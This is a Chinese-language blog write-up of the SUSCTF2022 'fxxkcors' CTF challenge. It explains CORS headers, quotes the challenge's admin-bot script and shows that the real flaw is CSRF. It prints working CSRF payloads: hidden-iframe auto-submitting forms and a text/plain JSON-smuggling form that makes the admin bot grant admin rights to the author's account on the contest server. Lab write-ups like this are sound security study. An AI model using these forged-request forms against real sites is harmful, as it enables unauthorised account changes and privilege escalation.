[SUSCTF2022]fxxkcors

最新推荐文章于 2024-04-17 09:52:03 发布
最新推荐文章于 2024-04-17 09:52:03 发布
阅读量505 收藏
点赞数
分类专栏: ctf 文章标签: 后端 php 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45751765/article/details/123207586
版权

1NDEX

0x00 前言

由于题目名字的关系一开始只想着是cors漏洞了
这个一开始雀氏没接触过
所以就一直在研究 当然最后证实只是一个csrf…
看看大佬的文章扫扫盲
CORS跨域漏洞的学习
(freebuff这篇讲的比较通透
cors安全完全指南
拾人牙慧一下
重点就是服务器返回响应包的头
Access-Control-Allow-Origin : 允许访问的源有哪些 对应请求包中的origin头
Access-Control-Allow-Credentials :是否允许带上cookie访问资源

题目附件一个js
一开始以为report那的三个url真是用来报告bug的… 没想到就是配着js看的
很像portswigger的oauth靶场
模拟admin登录并点击url

const opt = {
    name: "fxxkcors",
    router: "fxxkcors",
    site: process.env.FXXK_SITE ?? "",

}

const delay = (ms) => new Promise((resolve) => setTimeout(resolve, ms))

const visit = async (browser, url) =>{
    let site = process.env.FXXK_SITE ?? ""
    console.log(`[+]${opt.name}: ${url}`)
    let renderOpt = {...opt}
    try {
        const loginpage = await browser.newPage()
        await loginpage.goto(site)
        await loginpage.type("input[name=username]", "admin")
        await loginpage.type("input[name=password]", process.env.FXXK_ADMIN_PASS ?? "")
        await Promise.all([
            loginpage.click('button[name=submit]'),
            loginpage.waitForNavigation({waitUntil: 'networkidle0', timeout: 2000})
        ])
        await loginpage.goto("about:blank")
        await loginpage.close()

        const page = await browser.newPage()
        await page.goto(url, {waitUntil: 'networkidle0', timeout: 2000})

        await delay(2000) /// waiting 2 second.
        console.log(await page.evaluate(() =>  document.documentElement.outerHTML))

    }catch (e) {
        console.log(e)
        renderOpt.message = "error occurred"
        return renderOpt
    }
    renderOpt.message = "admin will view your report soon"
    return renderOpt
}

module.exports = {
    opt:opt,
    visit:visit
}

在题目多个地方截包都没看到Access-Control-Allow-*的返回头…
就意识到不对劲
不过csrf考察的并不是很多

0x01 brain.md

一个简易的loginpage
任意用户都能直接注册并登录(除了admin
在这里插入图片描述
随便搞个用户
只有normal admin能看到flag
在这里插入图片描述

进主页之后看到这里还是比较显眼的
注意… 定语从句
u want the person to be an normal admin
在这里插入图片描述
当然我们肯定自己没权限
拦一下看到json
在这里插入图片描述
在这里插入图片描述
另一个report界面
显然是让我们贴url的
在这里插入图片描述
补充一下一篇写的很好的csrf

csrf浅谈

讓我們來談談 CSRF

我们的目的就是要admin账户帮我们向changeapi.php post我们自己的账号
那么刚好就能用到跨站域请求伪造
当然再回头看一下我们post的包,发现这像敏感操作并没有携带token校验
这也证实了这是个可利用点

当我们需要发送post请求时,就可以利用表单的方式

iframe直接内联框架嵌入 并且不做展示
再通过js自动提交 不知不觉中触发表单

<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='https://small-min.blog.com/delete' target="csrf-frame" id="csrf-form">
  <input type='hidden' name='id' value='3'>
  <input type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>

form中的target属性指定了在不做显示的iframe中打开action的url,所以表面上不会产生任何变化

開一個看不見的 iframe,讓 form submit 之後的結果出現在 iframe 裡面,而且這個 form 還可以自動 submit,完全不需要任何操作。
关于iframe和form的联用
在这里插入图片描述

若用json传输

<form action="https://small-min.blog.com/delete" method="post" enctype="text/plain">
<input name='{"id":3, "ignore_me":"' value='test"}' type='hidden'>
<input type="submit"
  value="delete!"/>
</form>

這樣子會產生如下的 request body:

{ “id”: 3,
“ignore_me”: “=test”
}

第二个键值对ignore_me是为了规避 = 号的干扰

但這邊值得注意的一點是,form能夠帶的 content type
只有三種:application/x-www-form-urlencoded, multipart/form-data 跟
text/plain。在上面的攻擊中我們用的是最後一種,text/plain,如果你在你的後端 Server 有檢查這個 content
type 的話,是可以避免掉上面這個攻擊的。

回到题目中
有了上述的铺垫,我们就可以直接在VPS构造恶意页面

<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='http://124.71.205.122:10002/changeapi.php' target="csrf-frame" id="csrf-form" enctype="text/plain">
  <input type='hidden' name='{"username":"kidult", "abc":"' value='123"}'>
  <input type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>
这里有个小坑

当使用iframe跨域提交表单时会触发浏览器安全策略造成cookie丢失
iframe 跨域访问session/cookie丢失问题解决方法
iframe 跨域传递 cookie

比赛环境下 我们要去掉iframe

<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='http://124.71.205.122:10002/changeapi.php'  id="csrf-form" enctype="text/plain">
  <input type='hidden' name='{"username":"kidult", "abc":"' value='123"}'>
  <input type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>

在这里插入图片描述

0x02 rethink

自己挖的坑自己填

k_du1t
关注
专栏目录
SUSCTF 2018 做题记录
0verWatch的博客
06-05 7152
前言 最近好久都没做题目,刚好上次搭的题目还在,就不要浪费了,记录记录做题过程吧 正文 minBash 这个题目考的点是沙盒绕过,第一次玩这个东西??反正进去之后尝试ls,cat,file等各种那个命令均无效果,都会显示 -rbash: ls: command not found 发现有一篇好文章,有空瞅瞅:http://cauc.me/2017/11/16/python沙盒绕...
SUSCTF|WP:CrakeMe 一道android逆向
BadRer的博客
04-01 869
前言可能是第一次单字节手动爆flag开始这题是一个涉及到so动态调试的apk。我之前都是用红米note来进行动态调试的,因为android4.4感觉脱壳比较容易,但这次的版本要求为api 26也就是android8.0.这就有点蛋疼了,还好我自己用的手机够格,所以就拿自己手机上了。先是搭了一波环境,64位32位搞不清了都,ida附加了半天没附加上去,最后使用64位来调的。 check1函数的过
[SUSCTF]fxxkcors(CSRF提权)
Landasika的博客
05-17 360
首先注册登陆后发现 审计changepermission中的源码可以发现 这个地方需要我们提交一个usename的js表单进行用户提权, 根据题目的意思,我们需要提权之后才能看到flag。 首先用bp直接提交表单试试,结果发现这个地方需要admin的用户才能提权,那么我们需要进行CSRF让服务器给我们提权。 再分析report界面的js代码 const opt = { name...
SUSCTF2022WP
Pvr1sC的博客
02-28 859
出了一道Re,另一道是dart和flutter,干不动就这样了
SUSCTF2022 misc wp
wha1e的博客
02-28 2821
SUSCTF2022misc
SUSCTF2022的tttree逆向wp
sln_1550的博客
03-15 5161
这题最终有5个队伍解出来,我比赛的时候感觉不算很难,不过比赛的那两天正好有事,大致看了下觉得有希望,但是没什么时间所以没做出来。然后过了几天再做,没想到花了近一周的时间才搞定,确实超出我的能力了。 题目给了一个附件和提示:https://en.m.wikipedia.org/wiki/Treap 看了这个,知道了Treap就是二叉树和堆的结合体,和平衡二叉树有点类似。 代码基本是全汇编写的 ...
KnightCTF2022-WP
qq_45989120的博客
01-24 633
Feistel 密码结构 Challenge: m, n = 21, 22 def f(word, key): out = "" for i in range(len(word)): out += chr(ord(word[i]) ^ key) return out flag = open("flag.txt", "r").read() L, R = flag[0:len(flag)//2], flag[len(flag)//2:] x = "".join(chr
SUSCTF2022 Writeup:Dest0g3 Team的Java挑战解析
作者Dest0g3分享了在SUSCTF2022比赛中遇到的一些挑战和解决方法,其中涉及到Java反序列化漏洞的利用。 首先,讨论的是一个名为"babygadgetv1.0"的Web题目。作者最初认为这可能是一个涉及Tomcat服务器和EL...
Dest0g3-Java部分1
08-03
在描述中提到了SUSCTF 2022网络安全竞赛中的一些解题策略,其中涉及到Java反序列化漏洞、EL(Expression Language)表达式绕过以及XXE(XML External Entity)攻击。 【Java反序列化漏洞】: 在描述中,团队首先...
unctf2019 pwn部分题解
NoOneGroup
01-08 1585
unctf2019 pwn部分题解 新博客链接 babyheap easy,不讲了 #!/usr/bin/env python2 # -*- coding: utf-8 -*- from pwn import * local = 1 host = '127.0.0.1' port = 10000 context.log_level = 'debug' exe = '/tmp/tmp.spk5n...
SUSCTF2022 复现
njh18790816639的博客
03-07 274
1. happytree 2. rain 3. nemu(TQLCTF2022) 解答如下地址: 新博客地址
SUSCTF 2022 Crypto复现
M3ng@L的博客
09-14 1516
AnalysisAnalysisAnalysis 简答来说,题目中函数生成了一个实数矩阵A\pmb{A}AA,并且大小为;由以单个字符构成的大小的矩阵X\pmb{X}XX;由矩阵乘法B=AX\pmb{B}=\pmb{A}\pmb{X}BB=AAXX,生成结果矩阵b\pmb{b}bb;已知量有实数矩阵A\pmb{A}AA,以及结果矩阵B\pmb{B}BB我们已知矩阵乘法中的一个乘数矩阵以及结果矩阵,那么可以计算X=AB\pmb{X}=\pmb{A} \pmb{B}XX=AABB,得到矩阵X\pmb{X}XX;
SUSCTF2022的两道Java复现
feng的博客
03-02 1071
SUSCTF2022的两道Java复现 前言 比赛的时候没有看,一是因为摸了整个寒假,Java是一点想不起来了。。。二就是因为队里的心心直接秒了。。 不过这两道fastjson似乎都有一些奇奇怪怪的问题,复现的话从中学习一些东西就行了。 baby gadget v1.0 admin admin123登录后台后给了lib,然后有个fastjson反序列化的输入,根据题目意思是自己找链子但是似乎网上的链子也能打通: inputtext={"@type":"org.apache.xbean.propertyedi
漏洞分析 | CORS讲解与实战利用
最新发布
zkaqlaoniao的博客
04-17 1951
CORS,跨域资源共享(Cross-origin resource sharing),这种机制通过添加HTTP字段的方式规定服务器资源允许被哪些域访问(Access-Control-Allow-Origin)、请求中是否允许发送cookie(Access-Control-Allow-Credentials)、哪些请求类型是被允许的(Access-Control-Request-Method)等等。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。
ctfIDF实验室Fuck your brain
灵感点滴的分享
11-25 2477
Fuck your brain 2015-01-07 23:51:50 作者:cumirror 108514 这是什么,你能理解它吗? ++++++++++++[>++++>+++++>++++++>+++++++>++++++++>+++++++++>++++++++++>>>+++.---.>>>+++.>>++++++.>>>>----.>>>+++.>---.>+
CTF基础-MISC篇
热门推荐
Sn1P3r的博客
09-13 4万+
编码是什么?   编码是信息从一种形式或格式转换为另一种形式的过程,也称为计算机 编程语言的代码简称编码。 用预先规定的方法将文字、数字或其它对象编成数码,或将信息、数据 转换成规定的电脉冲信号。   编码在电子计算机、电视、遥控和通讯等方面广泛使用。编码是信息从 一种形式或格式转换为另一种形式的过程。解码,是编码的逆过程。  Morse编码   摩尔斯电码(Morse code...
网络安全】浅析跨域原理及如何实现跨域
wuli1024的博客
12-14 1251
我们在解决一个问题的时候应该先去了解这个问题是如何产生的,为什么会有跨域的存在呢?其实,最终的罪魁祸首都是浏览器的同源策略,浏览器的同源策略限制我们只能在相同的协议、IP地址、端口号相同,如果有任何一个不通,都不能相互的获取数据。并且,http和https之间也存在跨域,因为https一般采用的是443端口,http采用的是80端口或者其他。同源策略是一种约定,它是浏览器最核心也最基本的安全功能,如果缺少了同源策略,浏览器很容易受到XSS、CSRF等攻击。
CORS跨域资源共享漏洞的复现、分析、利用及修复过程
Innocence_0的博客
02-02 3236
CORS跨域资源共享漏洞与JSONP劫持漏洞类似,都是程序员在解决跨域问题中进行了错误的配置。攻击者可以利用Web应用对用户请求数据包的Origin头校验不严格,诱骗受害者访问攻击者制作好的恶意网站,
CORS跨域漏洞的学习
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
07-27 8416
学习CORS的漏洞和相关的一些知识梳理,网站如果存在这个漏洞就会有用户敏感数据被窃取的风险。 0x00 从浏览器的同源策略说起 SOP,同源策略 (Same Origin Policy),该策略是浏览器的一个安全基石,如果没有同源策略,那么,你打开了一个合法网站,又打开了一个恶意网站。恶意网站的脚本能够随意的操作合法网站的任何可操作资源,没有任何限制。 (图片来自网络) ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值